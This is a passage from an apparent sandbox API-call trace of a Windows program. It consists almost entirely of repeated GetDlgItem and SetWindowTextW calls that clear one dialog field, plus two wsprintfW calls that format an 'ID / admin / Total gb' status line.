(hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.442] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.488] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.489] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.538] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.538] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.610] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.610] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.676] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.676] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.722] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.722] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.781] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.781] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.863] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.863] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.910] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.910] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0109.957] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0109.957] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.019] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.019] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.082] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.082] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.144] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.144] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.207] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.207] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.272] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.272] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.347] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.347] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.393] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.393] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.749] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.749] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0110.979] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0110.980] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.033] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.033] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.102] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.102] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.158] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.158] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.236] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.236] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.281] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0111.281] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0111.281] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0111.281] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0111.284] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.284] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.376] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.376] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.423] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.423] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.494] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.494] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.533] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.533] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.595] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.595] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.658] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.658] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.720] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.720] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.782] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.782] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.854] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.854] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0111.906] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0111.906] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.076] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.076] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.416] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.416] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.468] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.468] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.577] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.577] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.624] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.624] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.671] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.671] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.749] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.749] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.796] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.796] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.843] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.843] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.905] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.905] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0112.968] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0112.968] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.031] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.031] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.093] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.093] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.170] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.170] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.225] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.226] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.280] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.280] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.342] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.342] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.404] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.404] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.467] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.467] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.529] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.529] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.592] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.592] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.654] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.654] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.716] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.717] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.778] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.778] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.841] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.841] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.903] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.903] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0113.966] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0113.966] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.028] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.028] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.091] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.091] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.153] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.153] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.216] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.216] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.279] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.279] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.341] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.341] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.402] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.403] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.466] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.466] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.528] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.528] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.591] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.591] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.652] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.653] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.715] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.715] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.777] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.777] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.840] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.840] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.917] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.917] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0114.964] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0114.964] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.027] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.027] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.089] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.089] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.151] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.151] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.214] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.214] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.277] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.277] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.720] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.720] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.729] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.729] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.791] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.791] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.900] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.900] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0115.963] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0115.963] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.025] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.025] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.088] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.088] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.150] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.150] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.212] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.212] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.275] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.275] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.337] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.337] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.399] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.399] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.462] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.462] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.525] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.525] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.589] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.589] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.649] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.649] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.711] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.711] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.774] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.774] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.836] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.836] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.898] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.898] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0116.961] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0116.961] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.027] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.027] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.117] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.117] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.172] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.172] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.229] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.229] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.273] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.273] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.336] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.336] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.399] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.399] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.461] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.461] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.524] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.524] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.600] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.600] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.650] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.650] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.818] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.818] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0117.834] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0117.834] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.011] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.011] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.047] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.048] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.088] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.088] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.186] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.186] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.241] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.241] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.287] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.287] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.334] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.334] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.397] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.397] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.459] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.459] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.522] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.522] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.614] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.614] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.650] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.650] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0118.834] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0118.834] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.071] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.071] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.114] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.114] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.181] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.181] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.239] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.239] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.301] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.301] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.364] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.364] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.427] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.427] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.503] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.503] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.574] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.574] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.929] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.929] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0119.957] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0119.957] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.020] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.020] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.082] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.082] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.264] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.264] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.330] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.330] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.377] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.378] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.440] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.440] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.502] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.502] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.831] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.831] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0120.970] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0120.970] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.033] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.033] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.095] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.095] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.158] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.158] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.220] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.220] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.282] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.282] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.344] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.344] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.578] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.578] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.641] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.641] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.703] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.703] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.766] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.766] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.829] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0121.829] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0121.829] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0121.829] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0121.830] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.830] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.892] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.892] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0121.953] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0121.953] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.015] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.015] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.079] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.079] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.140] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.140] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.202] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.203] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.265] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.265] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.327] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.327] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.390] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.390] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.452] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.452] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.515] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.515] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.577] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.577] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.640] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.640] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.702] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.702] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.764] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.764] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.827] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.827] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.889] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.889] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0122.951] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0122.951] SetWindowTextW (hWnd=0x80162, lpString="") returned 1 [0123.016] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0123.016] 